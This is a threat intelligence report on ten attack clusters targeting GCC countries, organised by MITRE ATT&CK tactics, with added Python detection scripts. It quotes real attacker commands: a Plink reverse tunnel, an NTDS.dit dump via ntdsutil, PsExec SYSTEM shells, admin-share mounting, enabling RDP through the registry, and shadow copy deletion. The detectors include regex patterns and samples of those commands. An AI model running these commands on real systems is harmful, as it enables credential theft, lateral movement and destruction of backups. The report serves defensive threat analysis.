
Threat Zone GCC 2024

Cyber threat overview for the GCC region



Contents

Introduction
MITRE ATT&CK matrix with a heat map
Part 1. Initial Access
Part 2. Establishing a Foothold
Part 3. Infrastructure Discovery
Part 4. Lateral Movement and Impact
About BI.ZONE


Introduction

The cyber threat landscape is volatile. Cybercriminals utilize newer and smarter tools, methods, and strategies to reach their goals. Moreover, threat actors tend to acquire distinct motivations and specific geographic traits to their crimes. Therefore, it is important for threat intelligence units to consider regional threat factors and their diversity.

At BI.ZONE, we have recently issued a comprehensive report—Threat Zone 2024—on the threat landscape in Russia and other CIS countries. We continue our exploration of regional threat landscapes and, this time, we focus on the Middle East, specifically: Saudi Arabia, Bahrain, Kuwait, Oman, Qatar, and the United Arab Emirates.

The region is developing fast, adopting new technologies, and making full use of the advantages that the digital sphere has to offer. Such transformation boosts a country’s economic and social development and brings benefits to its people, businesses, and government. At the same time, digital progress inevitably brings new threats. This report is our first dive into the modus operandi of threat actors targeting the region.

In this report, we looked at 10 clusters performing complex targeted attacks that were especially active in the region from 2023 through the first half of 2024, and presented an overview of their tactics, techniques, and procedures. We named each cluster according to our own taxonomy based on the motives of the threat actors:

■ hacktivism: Hyenas
■ financial gain: Wolves
■ espionage: Werewolves

The motives of individual groups are subject to change and vary over time.


The report consists of 4 parts:

Part 1
Explores initial access techniques and examples of how
adversaries find their way into the victim’s infrastructure.

Part 2
Reveals how malicious actors establish a foothold in the target
system and what routines they utilize to achieve this goal.

Part 3
Includes our findings of how adversaries discover
a compromised infrastructure.

Part 4
Describes common techniques used by threat actors to move
laterally and further impact the infrastructure.


Key takeaways

10 activity clusters reviewed in the report; 8 in 10 clusters focus on espionage.

Financial motivation: Arthro Wolf, Static Wolf
■ Use stolen credentials to infiltrate the infrastructure.
■ Actively deploy ransomware in their attacks.

Cyber espionage: Golden Werewolf, Noble Werewolf, Iron Werewolf, Wonder Werewolf, Dancing Werewolf, Winged Werewolf, Dissent Werewolf
■ Exploit vulnerabilities and deploy web shells to gain initial access.
■ Leverage custom and commercial malware, as well as full-featured post-exploitation frameworks.

Hacktivism (and espionage): Storm Hyena
■ Utilizes crafty phishing schemes to attack government entities.
■ Targets a variety of industries: government, telecom, insurance, retail, education, media, healthcare, finance.


■ Financially-motivated clusters are less active in GCC.

This trend may be explained by the low rates of ransom payouts, considering that targeted attacks commonly involve ransomware.

■ External-facing remote services are the most common entry points for adversaries.

Compromising such services is the preferred technique to gain initial access, especially now that valid credentials are so readily available.

■ PowerShell is the most common command and scripting interpreter abused by threat actors in GCC.

This allows adversaries to solve the majority of tasks at any stage of the attack lifecycle.

■ Some clusters engaged in espionage leverage commercial tools available on underground marketplaces.

This is noteworthy, as espionage-oriented adversaries tend to use custom malware. Those involved in espionage in the region also use custom post-exploitation frameworks to drastically limit the detection rate.

■ Adversaries active in GCC utilize a wide range of legitimate remote access tools.

This allows threat actors both to bypass defenses and to gain persistent access to the compromised environment.

■ The main impact is inflicted by exfiltrated sensitive data.

As most of the activity clusters focus on espionage, they may get the data either from compromised systems or various data repositories.


MITRE ATT&CK matrix with a heat map

Legend: Used by 5 and more groups / Used by 4 groups / Used by 3 groups or less (the colour shading of individual techniques is not reproduced in this text version; techniques are listed by tactic).

Initial Access: Drive-by Compromise; Exploit Public-Facing Application; External Remote Services; Phishing; Valid Accounts

Execution: Command and Scripting Interpreter; Exploitation for Client Execution; Native API; Scheduled Task/Job; System Services; User Execution; Windows Management Instrumentation

Persistence: Boot or Logon Autostart Execution; Create Account; Create or Modify System Process; Event Triggered Execution; External Remote Services; Hijack Execution Flow; Modify Authentication Process; Scheduled Task/Job; Server Software Component; Valid Accounts

Privilege Escalation: Abuse Elevation Control Mechanism; Exploitation for Privilege Escalation; Hijack Execution Flow; Process Injection; Valid Accounts; Access Token Manipulation

Defense Evasion: Abuse Elevation Control Mechanism; Deobfuscate/Decode Files or Information; Domain or Tenant Policy Modification; Hide Artifacts; Hijack Execution Flow; Impair Defenses; Impersonation; Indicator Removal; Indirect Command Execution; Masquerading; Modify Registry; Obfuscated Files or Information; Process Injection; System Binary Proxy Execution; Valid Accounts

Credential Access: Brute Force; Credentials from Password Stores; Forge Web Credentials; Input Capture; Modify Authentication Process; OS Credential Dumping; Steal or Forge Kerberos Tickets; Unsecured Credentials

Discovery: Account Discovery; Domain Trust Discovery; File and Directory Discovery; Group Policy Discovery; Network Share Discovery; Permission Groups Discovery; Process Discovery; Remote System Discovery; Software Discovery; System Information Discovery; System Owner/User Discovery; Virtualization/Sandbox Evasion

Lateral Movement: Lateral Tool Transfer; Remote Services; Software Deployment Tools; Use Alternate Authentication Material

Collection: Archive Collected Data; Automated Collection; Clipboard Data; Data from Information Repositories; Data from Local System; Data from Network Shared Drive; Data Staged; Email Collection; Input Capture; Screen Capture

Command and Control: Application Layer Protocol; Data Encoding; Encrypted Channel; Ingress Tool Transfer; Protocol Tunneling; Proxy; Remote Access Software; Web Service

Exfiltration: Automated Exfiltration; Exfiltration Over C2 Channel; Exfiltration Over Web Service

Impact: Account Access Removal; Data Destruction; Data Encrypted for Impact; Inhibit System Recovery; Service Stop


Part 1

Initial Access

To attack organizations in the region, the threat actors leverage a wide range of initial access techniques and sub-techniques. In this part of the report we will look at some examples of how adversaries gain access to their targets’ networks.


External Remote
Services (T1133)

According to BI.ZONE Threat Intelligence observations, external-facing remote services are the most common way for threat actors to gain initial access to their targets in the region.

In most cases adversaries use valid accounts (T1078) to abuse such services. This holds both for financially-motivated activity clusters and those involved in cyber espionage. For example, both Noble Werewolf and Arthro Wolf leveraged stolen credentials to access VPN appliances.


Noble Werewolf

It uses a wide range of initial access techniques, including the ones that abuse external remote services, phishing, and strategic web compromise. The adversary uses both off-the-shelf and custom malware like IMAPLoader.

Active since: December 2017
Aliases: Imperial Kitten, Tortoiseshell, TA456, Crimson Sandstorm, Yellow Liderc, HIVE0095, UNC3890, Cobalt Fireside
Target countries: Latin America, Middle East, UK, USA
Target industries: logistics, nuclear, aerospace, defense, IT

Arthro Wolf

The threat actors deploy various ransomware families to compromised environments, including Rhysida, Zeppelin, BlackCat, Quantum, and HelloKitty.

Active since: November 2020
Aliases: Vice Society, Vanilla Tempest, STAC5279, Gold Victor
Target countries: Middle East, Brazil, Germany, Indonesia, Italy, Singapore, USA
Target industries: education, healthcare, government, defense, manufacturing, retail, finance, IT

In many cases, adversaries obtain valid authentication material via stealer logs, which can be either bought through underground forums and marketplaces, or just collected from similar sources, including various Telegram channels.

Depending on the obtained privileges, the threat actors may start moving laterally immediately after remote system discovery (T1018).


Exploit Public-Facing
Application (T1190)

Many clusters active in the region still use quite old vulnerabilities in Internet-facing systems to obtain initial access.

For example, Golden Werewolf has been seen to exploit a vulnerability in SharePoint (CVE-2019-0604), which enabled the adversary to deploy web shells (T1505.003) and gain persistent access to the compromised environment.


Golden Werewolf

It runs espionage operations in the MENA region and uses a wide range of custom malware and tools, including Toxocara, Trichuris, and Helminth.

Active since: 2014
Aliases: OilRig, APT34, Crambus, Hazel Sandstorm, Helix Kitten, Yellow Maero, Cobalt Gypsy
Target countries: Bahrain, China, Egypt, Jordan, Kuwait, Lebanon, Oman, Qatar, Saudi Arabia, UAE
Target industries: financial, government, energy, telecom

Another example is Iron Werewolf. This cluster actively exploited both ProxyLogon (CVE-2021-26855) and ProxyShell (CVE-2021-34473) with the same objective, which was to deploy web shells to the compromised Microsoft Exchange servers and enable post-exploitation activities.

Iron Werewolf

It performs targeted attacks with the goal of intelligence collection across a wide range of industry verticals. It uses both common malware like PlugX as well as custom utilities like SysUpdate.

Active since: 2013
Aliases: Emissary Panda, APT27, Budworm, Lucky Mouse, Iron Tiger, Bronze Union, TG-3390, Earth Smilodon
Target countries: Middle East, Canada, India, Japan, South Korea, Mongolia, Russia, Thailand, Turkey, UK, USA
Target industries: government, manufacturing, telecom, defense, IT


Phishing
(T1566)

Observed activity clusters often demonstrated a creative approach to phishing attacks.

For example, Storm Hyena targeted Middle Eastern government entities with economic-themed lures using Dropbox links. These links led to malicious Microsoft PowerPoint Add-in (PPAM) files, which are not very common among threat actors. As a result, IronWind malware was installed on compromised systems.


Storm Hyena

Its engagements include targeted spearphishing attacks, DDoS attacks, and website defacements. The cluster is involved both in hacktivism and espionage activities.

Active since: 2011
Aliases: Molerats, Extreme Jackal, Arid Viper, APT-C-23, Gaza Cybergang, TA402, Aluminum Saratoga, Desert Falcon
Target countries: Egypt, Israel, Jordan, Lebanon, Palestine, Saudi Arabia, Syria, UAE
Target industries: government, telecom, insurance, retail, education, media, healthcare, finance

Interestingly enough, some clusters used not only phishing emails but also messengers and social networks. For example, Wonder Werewolf leveraged WhatsApp to send phishing messages to its targets. Such messages contained Dropbox links, which led to archives with legitimate documents and the CMD365 backdoor loader.

Wonder Werewolf

A cluster which performs targeted espionage-related attacks against telecommunication providers in the Middle East using messengers and custom malware.

Aliases: WIP26
Target countries: Middle East
Target industries: telecom

Some clusters use diverse phishing delivery methods. For example, Dancing Werewolf used both Facebook and Discord, as well as phishing emails, to deliver links to malicious CAB files, which allowed the adversary to load the NjRAT binary into memory and inject it into a legitimate .NET binary file.


Dancing Werewolf

A cluster active at least since mid-2022. The threat actors use NjRAT to attack various organizations in the Middle East and North Africa.

Active since: mid-2022
Aliases: Earth Bogle
Target countries: Middle East and North Africa
Target industries: various

Drive-by
Compromise (T1189)

Noble Werewolf was also spotted behind watering hole attacks to trick victims into downloading malicious Microsoft Excel files. These files enabled the adversary to deploy a simple Python backdoor to the compromised system.


Part 2

Establishing a Foothold

Once adversaries obtain initial access to the target system, they need to establish a foothold. This stage involves ingress tool transfer (T1105) and typically includes persistence, privilege escalation, defense evasion and credential access routines.

Threat actors leverage not only malware, both custom (e.g., IronWind, TunnelSpecter, PlugX, etc.) and commercial (e.g., NjRAT and SystemBC), but also full-featured post-exploitation frameworks. These frameworks include the commercial Cobalt Strike—one of the most preferred tools for financially-motivated activity clusters (i.e., ransomware attacks), and Ladon—the preferred choice for Chinese-speaking adversaries. Some threat actors even create their own frameworks. For example, Winged Werewolf leveraged a custom framework named LIONTAIL by Check Point researchers.

Winged Werewolf

It primarily targets government, military, and telecommunication organizations in the Middle East, using the LIONTAIL framework. This activity may be linked to another cluster, Golden Werewolf.

Active since: 2022
Aliases: Scarred Manticore
Target countries: Middle East
Target industries: military, telecom, IT, finance, NGO

In this part of the report, we will highlight some techniques that adversaries use to achieve persistent access to their targets.


Command and Scripting Interpreter (T1059)

Many threat actors used quite common interpreters, such as Windows Command Shell (T1059.003) and PowerShell (T1059.001). We see examples like this in Golden Werewolf, where a wide range of PowerShell scripts were used to perform tasks at various stages of the attack lifecycle.

Some activity clusters used multiple scripting interpreters simultaneously, such as the Dancing Werewolf’s dropper dropping a VBS script (T1059.005), a PowerShell script, and a Windows batch script.

In some cases, adversaries may install the interpreters they need directly on the compromised system. For example, Noble Werewolf downloaded the Python interpreter and used it to execute a simple shell dropped in the %TEMP% folder.

Windows Management
Instrumentation (T1047)

Adversaries also leverage Windows Management Instrumentation (WMI) to execute commands on the compromised system. This is especially popular among threat actors that gather system information.

For example, Dissent Werewolf used various WMI queries to collect information about the operating system, network adapters, drives, services, drivers, processes, users, environment variables, and installed software.


Dissent Werewolf

It primarily targets journalists, activists, and dissidents in the Middle East. The cluster leverages advanced malware such as Deadglyph.

Active since: 2012
Aliases: Stealth Falcon
Target countries: Middle East
Target industries: media, NGO

User Execution (T1204)

Many clusters rely on some victim interaction to deliver malicious files to the target system; this is known as phishing. As we noted in Part 1, adversaries may use both emails and messengers to deliver malicious links (T1204.001) or files (T1204.002) and lure the target to download it, execute it, and compromise the system.

Event Triggered
Execution (T1546.003)

Many threat actors leverage quite common persistence mechanisms, such as creating scheduled tasks, dropping malicious files to the startup folder, and creating new services.

At the same time, some adversaries use more creative approaches. For example, Dissent Werewolf’s Deadglyph used WMI Event Subscription to run a registry shellcode loader.


Create Account (T1136)

Adversaries often create new accounts to have persistent access to the compromised environment. For example, Iron Werewolf created an account named SUPPORT_388945c0, which mimics a legitimate default account, SUPPORT_388945a0.
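As an added defender-side example (not from the report or BI.ZONE's tooling), the following Python flags account names that sit a short edit distance from a built-in name, which is exactly how SUPPORT_388945c0 imitates SUPPORT_388945a0. The built-in list beyond the SUPPORT_ account and the sample account names are constructed assumptions.

```python
"""Flag account names that imitate well-known built-in Windows accounts.

Hypothetical hunting check written for this report (not BI.ZONE's code).
Every enumerated account name is compared against a list of built-in names:
an exact match is the real account, a short edit distance is a lookalike.
"""

# Built-in names adversaries tend to imitate. SUPPORT_388945a0 is the one quoted
# in the report; the others are standard Windows defaults (assumed baseline).
BUILTIN_NAMES = ["SUPPORT_388945a0", "Administrator", "Guest", "DefaultAccount", "krbtgt"]

# Constructed sample of account names, as a SAM/AD enumeration would return them.
SAMPLE_ACCOUNTS = [
    "Administrator", "Guest", "SUPPORT_388945a0", "SUPPORT_388945c0",
    "jdoe", "Adminlstrator", "svc_backup",
]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, case-insensitive because SAM account names are."""
    a, b = a.lower(), b.lower()
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete ca
                           cur[j - 1] + 1,         # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def find_lookalike_accounts(accounts, builtins=BUILTIN_NAMES, max_distance=2):
    """Return (account, imitated_builtin, distance) for names that are close to,
    but not identical with, a built-in account name."""
    hits = []
    for acct in accounts:
        for real in builtins:
            d = edit_distance(acct, real)
            if 0 < d <= max_distance:
                hits.append((acct, real, d))
    return hits


if __name__ == "__main__":
    for acct, real, d in find_lookalike_accounts(SAMPLE_ACCOUNTS):
        print(f"{acct!r} looks like built-in {real!r} (edit distance {d})")
```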

Server Software
Component (T1505)

Since many threat actors, which are active in the region, focus
on exploiting public-facing applications, especially, Microsoft
Exchange servers, they often deploy web shells (T1505.003)
to enable post-exploitation.

One of the most popular examples is China Chopper—the notorious web shell commonly used by Chinese-speaking adversaries.

Some frameworks also enable threat actors to use web shells. A good example is LIONTAIL used by Winged Werewolf.

Access Token
Manipulation (T1134)

In some cases, adversaries do not have enough privileges to effectively perform post-exploitation activities. Usually, in such cases, they bring additional tools to enable privilege escalation.

For example, Iron Werewolf used JuicyPotatoNG and SharpEfsPotato to escalate privileges.


Hijack Execution Flow (T1574)

Adversaries may use legitimate binaries to side-load malicious DLLs (T1574.002). For example, Storm Hyena used a legitimate Timeout.exe to side-load IronWind malware.

System Binary Proxy Execution (T1218)

To evade some defenses, adversaries leverage legitimate system binaries for so-called proxy execution. For example, Dissent Werewolf used rundll32 (T1218.011) to execute malicious DLLs:

rundll32 C:\Windows\System32\pbrtl.dll,#1

Process Injection
(T1055)

Another quite common technique used by adversaries is the injection of malicious code into legitimate processes. For example, Dancing Werewolf leveraged a PowerShell script to inject NjRAT into aspnet_compiler.exe.


Impair Defenses (T1562)

Adversaries involved in human-operated ransomware attacks often need to disable existing security controls before enabling ingress tool transfer, and they usually tend to have the appropriate capabilities. For example, Arthro Wolf used SILENTKILL, a PowerShell-based tool for terminating security-related processes and services, deleting shadow copies, modifying RDP configurations, and changing the AD password.

Input Capture (T1056)

To obtain additional credential material, some adversaries tried to capture user input. For example, Golden Werewolf leveraged an infostealing malware called Clipog, which enabled them to copy clipboard data, capture keystrokes, and log the processes that used keystrokes.

OS Credential Dumping
(T1003)

Interestingly enough, tools like Mimikatz are still extremely popular both among espionage-focused and financially-motivated activity clusters. Iron Werewolf and Golden Werewolf are just a few examples caught using this tool for credential dumping.


Modify Authentication
Process (T1556)

Some adversaries leverage more advanced techniques to obtain authentication material. For example, Golden Werewolf abused password filters in order to obtain credential material both for domain and local users. The threat actors dropped psgfilter.dll into C:\Windows\System32 and performed a registry modification to register the password filter (HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\Notification Packages = scecli, psgfilter).
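An added example (not part of the report) of auditing the LSA Notification Packages value that this technique modifies: it parses the text that reg query prints for the Lsa key and flags any package outside an allow-list. The sample reg query output, the baseline set, and the function names are constructed assumptions; the same value should be checked under every ControlSet, since the observed modification above targeted ControlSet001.

```python
"""Audit the LSA "Notification Packages" value for unexpected password-filter DLLs.

Hypothetical defender-side check written for this report (not BI.ZONE's tooling).
It parses the text printed by
    reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages"
(a constructed sample is embedded below) and reports every package that is not in
the baseline. reg.exe prints REG_MULTI_SZ entries joined by a literal "\0".
"""
import re
from dataclasses import dataclass

# Packages Windows registers by default: scecli is always present, rassfm shows up
# on some server roles. Assumed baseline; adjust to your own golden image.
DEFAULT_PACKAGES = {"scecli", "rassfm"}

# Constructed sample of reg.exe output after the modification described above.
SAMPLE_REG_QUERY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Notification Packages    REG_MULTI_SZ    scecli\0psgfilter
"""

_VALUE_LINE = re.compile(
    r"^\s*Notification Packages\s+REG_MULTI_SZ\s+(?P<data>.*?)\s*$", re.MULTILINE
)


def parse_notification_packages(reg_output: str) -> list[str]:
    """Return the package names listed in reg query output, in registry order."""
    m = _VALUE_LINE.search(reg_output)
    if not m:
        raise ValueError("Notification Packages value not found in output")
    # reg.exe separates REG_MULTI_SZ entries with a literal backslash-zero.
    return [p for p in m.group("data").split(r"\0") if p]


@dataclass(frozen=True)
class Finding:
    package: str
    reason: str


def audit_notification_packages(packages: list[str], baseline=DEFAULT_PACKAGES) -> list[Finding]:
    """Flag entries outside the baseline, and entries that smuggle in a path
    (LSA expects a bare DLL name that it loads from System32)."""
    findings = []
    for pkg in packages:
        name = pkg.lower()
        base = name[:-4] if name.endswith(".dll") else name
        if "\\" in base or "/" in base or ".." in base:
            findings.append(Finding(pkg, "path component in a value that should be a bare DLL name"))
        elif base not in baseline:
            findings.append(Finding(pkg, "not in the baseline of expected LSA notification packages"))
    return findings


def audit_reg_output(reg_output: str) -> list[Finding]:
    """Convenience wrapper: parse then audit."""
    return audit_notification_packages(parse_notification_packages(reg_output))


if __name__ == "__main__":
    for f in audit_reg_output(SAMPLE_REG_QUERY_OUTPUT):
        print(f"suspicious notification package {f.package!r}: {f.reason}")
```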

Application Layer
Protocol (T1071)

Despite the fact that many activity clusters use web protocols (T1071.001) to communicate with a compromised system, some threat actors use a more creative approach.

For example, Iron Werewolf’s TunnelSpecter leverages DNS tunneling (T1071.004) for communication with the command and control server.

Another example is Wonder Werewolf’s CMD365, which uses the Microsoft Graph API with a Microsoft 365 Mail inbox that has the role of a C2 server (T1071.003).


Web Service (T1102)

Threat actors also use various web services to enable command and control. For example, Noble Werewolf’s IMAPLoader connected to imap.yandex[.]com over TLS.

Another example is where Wonder Werewolf’s CMDEmber interacted with a Google Firebase Realtime Database instance and used it as the command and control server.

Protocol Tunneling
(T1572)

Adversaries often look for convenient ways to have persistent access to the compromised environment. For example, Golden Werewolf used Plink:

msssh.exe [redacted] -P [redacted] -C -N -R 0.0.0.0:54231:127.0.0.1:3389 -l [redacted] -pw [redacted]

It enabled the threat actors to create a tunnel and use the remote desktop protocol.


Remote Access
Software (T1219)

Many threat actors also leverage legitimate remote access software as an alternative means of persistent access to the compromised environment.

For example, Noble Werewolf enabled such access with MeshAgent, while Arthro Wolf did the same with another popular remote access tool, AnyDesk.


Part 3

Infrastructure Discovery

Before moving laterally, adversaries need to collect information about the compromised IT infrastructure. They usually collect it both about the initially compromised system and remote systems. We tend to distinguish this stage from establishing a foothold, as it usually marks the gap between one compromised system and multiple compromised systems.

In this part of the report, we will look at how various threat actors perform compromised infrastructure discovery.


Account Discovery
(T1087)

One of the first discovery steps is for the adversary to collect information about both local and domain accounts. It is quite common for threat actors to use Active Directory reconnaissance tools to obtain such information.

For example, Static Wolf leveraged AdFind to enumerate domain users.

Static Wolf

The threat actors use the leaked LockBit builder to execute ransomware attacks worldwide. The group is known to obtain initial access through compromised valid accounts.

Active since: April 2024
Aliases: EstateRansomware
Target countries: France, Hong Kong, Malaysia, UAE, USA
Target industries: various


System Information
Discovery (T1082)

Both malicious software and frameworks leveraged by various threat actors have the capability to collect compromised system information.

Winged Werewolf’s LIONTAIL allowed an adversary to use the Windows API to collect system information. For example, GetComputerNameW was used to get the PC name, while GetEnvironmentVariableA was used to get the domain name.

Another example is Dissent Werewolf’s Deadglyph. This malware extensively used WMI to collect a variety of information. For example, the following query was used to collect information about the operating system:

SELECT * FROM Win32_Product

Permission Groups
Discovery (T1069)

Threat actors usually need to collect not only system information, but also information about users and permission groups. They can either rely on the built-in utilities or use command and scripting interpreters to achieve this goal.

For example, Golden Werewolf leveraged PowerShell to collect the information:

powershell -NoProfile -Command "& {$j = sajb {$ErrorActionPreference = 'SilentlyContinue';$groups = Get-LocalGroup | Select-Object Name, Domain, SID;foreach($g in $groups){-join($g.SID,'|',$g.Name);$members = Get-LocalGroupMember -SID $g.SID | Select *;foreach($m in $members){-join(' ',$m.SID,'|',$m.Name,'|',$m.ObjectClass,'|',$m.PrincipalSource);}}};$r = wjb $j -Timeout 300;rcjb $j;}"

Here sajb, wjb, and rcjb are the built-in PowerShell aliases for Start-Job, Wait-Job, and Receive-Job: the enumeration runs as a background job with a 300-second timeout.


Software Discovery
(T1518)

Information about the installed software, and especially security software, may be extremely important for an adversary, as this may seriously affect the subsequent activities.

We already mentioned Deadglyph’s reconnaissance capabilities. The malware also uses WMI queries to discover security software:

SELECT * FROM AntiVirusProduct

SELECT * FROM AntiSpywareProduct

SELECT * FROM FirewallProduct

Remote System
Discovery (T1018)

Before starting lateral movement, adversaries usually collect information about remote systems. In most cases, the threat actors leverage various network scanners to achieve this goal.

One such scanner is Nbtscan, used by Iron Werewolf. This is also a very popular network scanner among Chinese-speaking threat actors.

Another example is SoftPerfect Network Scanner, used by Noble Werewolf. It’s important to note that such scanners are commonly used by a large number of both espionage-focused and financially-motivated clusters because these tools are easy to get and operate. Some threat actors do not even bother to rename these tools after downloading them from official websites.


Part 4

Lateral Movement
and Impact

Once threat actors collect enough information about the initially compromised system and environment, and once they obtain proper authentication material and privileges, they start moving laterally and achieve further goals.

In the final part we will look at the common techniques that adversaries were observed to use during the later stages of the attack lifecycle.


Remote Services (T1021)

Of course, the most common way to move laterally is to abuse legitimate remote services. Most activity clusters, be they espionage or ransom, leverage the remote desktop protocol (T1021.001) to jump from one system to another.

This capability may not be enabled in the compromised environment, so adversaries have to make some changes in the settings. For example, Golden Werewolf modified the registry to achieve this goal:

reg.exe ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Another very popular way to execute commands on a remote system, distribute tools, or get access to files is to abuse SMB (T1021.002). For example, adversaries may simply mount a remote system’s disk to the compromised system to get access to its contents:

net use \\[redacted]\c$ /user:[redacted] [redacted]

Adversaries may also abuse it using legitimate tools. For example, Arthro Wolf leveraged PsExec for remote command execution:

PsExec.exe -i -s powershell.exe

This approach enabled the threat actors to obtain a PowerShell session and execute commands on the compromised remote system.

Also, adversaries may need to move laterally to the *nix part of the compromised infrastructure. SSH (T1021.004) is commonly used to achieve this and to get, for example, to the victim’s ESXi servers.


Lateral Tool Transfer (T1570)

In many cases, an adversary needs to distribute the toolset from the initially compromised system to another system in the environment to execute commands, collect information, and gain redundant access.

Threat actors may use either malware or post-exploitation frameworks, or even legitimate remote access tools. We also caught adversaries using AnyDesk, SimpleHelp, Atera, ScreenConnect, and RemoteUtilities among others.

OS Credential Dumping
(T1003)

Adversaries may need to obtain additional credential material to get access to more systems in the compromised environment. They may either use techniques described in Part 2 of this report, or use other methods, for example, exfiltrate the NTDS.dit file:

ntdsutil.exe "ac i ntds" "ifm" "create full c:\temp_l0gs" q q

Such dumps are used by adversaries for later cracking.


Data from Local System (T1005)

Both financially-motivated threat actors and those involved in espionage collect sensitive data from various systems they get access to.

Cybercriminals typically focus on all types of sensitive data, as in the case of ransomware attacks, where criminals steal all the files they can to post on their Dedicated Leak Site for double extortion.

Adversaries who focus on espionage have a more targeted approach to data collection. Based on our observations, such threat actors show interest in China-related information, military operations, the relations of targeted countries with President Biden’s administration, geopolitical and economic information, telecommunications technology, OPEC operations, etc.

Data from Network Shared Drive (T1039)

Network shared drives usually contain lots of files from various users, so they are a gold mine for adversaries and one of the first things they want to obtain during the lateral movement phase.


Email Collection (T1114)

In some cases, adversaries collect full mailboxes. For example, Iron Werewolf leveraged PowerShell to achieve this:

New-MailboxExportRequest -Name Request1 -Mailbox [redacted] -ContentFilter $filter -FilePath [redacted].pst

Data from Information Repositories (T1213)

Usually, adversaries don’t limit data collection activities to obtaining files and folders from compromised systems. They also leverage various information repositories to collect sensitive data. This may include SQL databases, Confluence (T1213.001), and SharePoint (T1213.002), to name a few.

Data Staged (T1074)

Adversaries may exfiltrate data directly to the command and control infrastructure, but in some cases, especially if they collect data from various information repositories, they may also stage it on one or multiple compromised systems.


Exfiltration Over C2
Channel (T1041)

As we already mentioned, threat actors active in the region use a wide range of both custom and open-source/commercial tools and malware, so their capabilities are commonly abused to exfiltrate the collected data.

Exfiltration Over Web Service (T1567)

In some cases, especially when threat actors need to exfiltrate large datasets, they leverage various web services and tools like WinSCP, rclone, and others.

Inhibit System Recovery (T1490)

Financially-motivated adversaries involved in ransomware attacks usually remove any available backups, including those available by default.

For example, Arthro Wolf’s Rhysida ransomware had the capability to remove volume shadow copies:

cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
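The shadow-copy deletion above, together with the registry, net use, PsExec and ntdsutil commands quoted under Remote Services and OS Credential Dumping earlier in Part 4, share a shape that process-creation telemetry can catch. The following Python is an added detection example (not BI.ZONE's detection content): it normalizes constructed 4688-style records and runs them through rules for RDP enablement via the registry, admin-share mounting with explicit credentials, PsExec SYSTEM shells, ntdsutil IFM dumps and shadow-copy deletion, then groups hits per user so one operator touching several stages stands out. Record field names and sample values are assumptions.

```python
"""Match process command lines against the Part 4 lateral movement and impact
behaviours. Added example for this report, not BI.ZONE's detection content.
Input records mimic Windows Security 4688 (process creation) events; the dict
keys "host", "user" and "cmdline" are assumptions of this example."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str
    pattern: re.Pattern


# Patterns are written against a normalized command line: lower-cased, quotes
# removed, whitespace collapsed. Dropping quotes lets the registry rule match
# "HKLM\...\Terminal Server" whether or not the operator quoted the key.
RULES = [
    Rule("RDP enabled via registry", "T1021.001",
         re.compile(r"\breg(?:\.exe)?\s+add\b.*\\terminal server.*fdenytsconnections.*/d\s+0\b")),
    Rule("Admin share mounted with explicit credentials", "T1021.002",
         re.compile(r"\bnet(?:1)?(?:\.exe)?\s+use\b.*\\\\[^\\\s]+\\(?:c|admin)\$.*\s/user:")),
    Rule("PsExec interactive SYSTEM shell", "T1021.002",
         re.compile(r"\bpsexec(?:64)?(?:\.exe)?\b.*(?:\s-s\b.*\s-i\b|\s-i\b.*\s-s\b)")),
    Rule("NTDS.dit dumped with ntdsutil IFM", "T1003.003",
         re.compile(r"\bntdsutil(?:\.exe)?\b.*\bifm\b.*\bcreate\s+full\b")),
    Rule("Volume shadow copies deleted", "T1490",
         re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b.*/(?:all|quiet)")),
]

# Constructed sample telemetry: five command lines modelled on the ones quoted in
# Part 4, plus two benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe",
     "cmdline": r'reg.exe ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"host": "WS01", "user": "CORP\\jdoe",
     "cmdline": r"net use \\FS01\c$ /user:CORP\svc_backup <password>"},
    {"host": "WS01", "user": "CORP\\jdoe",
     "cmdline": r"PsExec.exe -i -s powershell.exe"},
    {"host": "DC01", "user": "CORP\\jdoe",
     "cmdline": r'ntdsutil.exe "ac i ntds" "ifm" "create full c:\temp_l0gs" q q'},
    {"host": "FS01", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": r"cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet"},
    {"host": "WS02", "user": "CORP\\asmith",  # benign: read-only query
     "cmdline": r'reg.exe query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections'},
    {"host": "WS02", "user": "CORP\\asmith",  # benign: ordinary share mapping
     "cmdline": r"net use Z: \\FS01\public"},
]


@dataclass(frozen=True)
class Alert:
    host: str
    user: str
    rule: str
    technique: str


def normalize(cmdline: str) -> str:
    """Lower-case, strip quotes and collapse whitespace so rules stay simple."""
    return " ".join(cmdline.replace('"', "").replace("'", "").split()).lower()


def scan_events(events, rules=RULES) -> list[Alert]:
    """Return one Alert per (event, rule) match, in event order."""
    alerts = []
    for ev in events:
        cmd = normalize(ev["cmdline"])
        for rule in rules:
            if rule.pattern.search(cmd):
                alerts.append(Alert(ev["host"], ev["user"], rule.name, rule.technique))
    return alerts


def sequence_summary(alerts) -> dict[str, list[str]]:
    """Group matched techniques by user: several distinct techniques under one
    account within a short window is the chain Part 4 describes."""
    by_user: dict[str, set] = {}
    for a in alerts:
        by_user.setdefault(a.user, set()).add(a.technique)
    return {user: sorted(techs) for user, techs in by_user.items()}


if __name__ == "__main__":
    hits = scan_events(SAMPLE_EVENTS)
    for a in hits:
        print(f"{a.host} {a.user}: {a.rule} ({a.technique})")
    print(sequence_summary(hits))
```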


Data Encrypted
for Impact (T1486)

In most cases, ransomware attacks involve data encryption. While some adversaries use custom ransomware samples or those from ransomware-as-a-service programs, others just use leaked builders.

